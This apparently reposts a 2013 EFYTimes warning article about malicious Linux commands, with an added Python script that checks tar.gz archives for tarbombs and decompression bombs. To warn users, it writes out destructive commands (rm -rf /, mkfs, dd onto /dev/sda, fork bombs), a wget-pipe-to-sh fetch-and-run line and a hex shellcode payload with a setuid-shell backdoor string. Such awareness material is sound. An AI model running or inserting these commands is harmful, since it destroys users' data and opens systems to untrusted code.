Some Malicious Linux Commands You Should Be Aware Of (According to EFYTimes)

Linux commands can be risky for the health of your computer and data. Don't believe it? We are listing some of them for you here...
Thursday, September 26, 2013: For Linux users, it is important to have a basic understanding of malicious commands that can make your life difficult if executed. You need to be cautious when running any of these commands. It is also important to always enable a password-protected screensaver, so that a casual passer-by cannot run one of these commands from your keyboard while you are away from your PC.
Listed below are some common examples of risky Linux commands. Remember, they are extremely dangerous and should not be tried on any PC holding valuable data. Most of these commands can cause damage from a LiveCD environment as well.
Delete all files, delete current directory, or delete visible files in current directory

rm means remove, -f indicates "force" deletion (even if the file is write-protected), and -r means do it recursively, i.e. including all subdirectories. Therefore "rm -rf /" forces removal of everything in the root directory and all its subdirectories. "rm -rf ." forces deletion of the current directory and all its subdirectories. "rm -rf *" forces deletion of all files in the current directory and all its subdirectories (a plain * does not match names beginning with a dot, but everything else goes).
rm -rf /
rm -rf .
rm -rf *
Reformat data on a device

Whatever device is passed to the mkfs command will be wiped and replaced with a blank filesystem.
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation
These commands write raw data to a block device. This usually overwrites the filesystem and causes complete loss of data:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb

Though they look harmless, even intriguing, these commands spawn an enormous number of processes until the system freezes, which may force a hard reset of the PC. This can cause data corruption or damage to the operating system.
• In Bourne-ish shells (like Bash):
:(){:|:&};:
• In Perl:
fork while fork
Tarbomb

Someone asks you to extract a tar archive into the current directory. The archive can be crafted to burst into a million files, or to inject files into the system by guessing filenames (entries whose paths land outside the directory you extracted into). It is highly recommended that you extract tar archives into a clean, empty directory. Only after you have verified that the extracted files are what you expected should they be copied to the final target directory.
Decompression bombs

Someone asks you to extract an archive that looks like a small download. In fact it is highly compressed data that will expand to hundreds of GB, filling your hard drive. Avoid downloading and extracting any data, utility, or software from an untrusted source.
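A defender-side check covering both the tarbomb and the decompression-bomb cases above: audit a .tar.gz archive's member names and its claimed uncompressed size before anything is extracted. This is an added example, not code from the EFYTimes article; the thresholds (10,000 members, a 200:1 ratio) and the two sample archives are constructed here as assumptions.

```python
"""Audit a .tar.gz before extracting it: path traversal, absolute paths,
tarbomb layout and implausible compression ratio. Added example, not the
article's code; thresholds and sample archives are constructed here."""
import io
import posixpath
import struct
import tarfile

def gzip_claimed_size(data: bytes) -> int:
    """Uncompressed length the gzip trailer claims (ISIZE, modulo 2**32)."""
    return struct.unpack("<I", data[-4:])[0]

def audit_tar_gz(data: bytes, max_members=10_000, max_ratio=200) -> dict:
    """Inspect member metadata only; nothing is written to disk."""
    traversal, absolute, top_level, members = [], [], set(), 0
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for m in tar:
            members += 1
            # Link targets can escape the target directory just as names can.
            paths = (m.name, m.linkname) if (m.issym() or m.islnk()) else (m.name,)
            for p in paths:
                if p.startswith("/"):
                    absolute.append(p)
                if ".." in posixpath.normpath(p).split("/"):
                    traversal.append(p)
            top_level.add(posixpath.normpath(m.name).lstrip("/").split("/")[0])
    ratio = gzip_claimed_size(data) / len(data)
    return {
        "members": members, "traversal": traversal, "absolute": absolute,
        "top_level": sorted(top_level), "ratio": round(ratio, 1),
        # Tarbomb: entries spray across the cwd instead of one top-level dir.
        "tarbomb": len(top_level) > 1 or members > max_members,
        # Decompression bomb: claimed output dwarfs the downloaded size.
        "size_bomb": ratio > max_ratio,
    }

def build_sample(entries) -> bytes:
    """Constructed in-memory .tar.gz from (name, body) pairs."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in entries:
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()

TARBOMB = build_sample([("README", b"hi"), ("project/src.c", b"int main(){}"),
                        ("../.profile", b"x"), ("/etc/motd", b"x")])
BOMB = build_sample([("zeros.bin", b"\0" * 4_000_000)])  # ~1000:1 when gzipped
```

Run audit_tar_gz(TARBOMB) and audit_tar_gz(BOMB) to see the first flagged for traversal, an absolute path and a scattered top level, and the second flagged purely on its claimed size.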
Malicious code in shell scripts

Someone sends you a shell script (which can be executed from the command line with ./script_name) and recommends that you download and run it. The script may contain any command, benign or malicious. Never execute code from an untrusted source. For example:
wget http://some_place/some_file
sh ./some_file
or 
wget http://some_place/some_file -O- | sh
Malicious source code to be compiled and then executed

You receive source code from someone and are asked to compile it. Did you know it is easy to hide malicious code inside a large pile of source code? Avoid compiling, or executing the resulting binary, unless it is a trusted application obtained from a reputable site. For example, the downloaded code contained this malicious payload:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
This looks like "hex code gibberish" to a new, or even a fairly experienced, computer user. However, it actually runs
rm -rf ~ / &
which destroys your home directory if you are a regular user, and all your files if you are logged in as root.

This is thanks to EFYTimes; the original is listed here:
http://www.efytimes.com/e1/fullnews.asp?edid=116920 
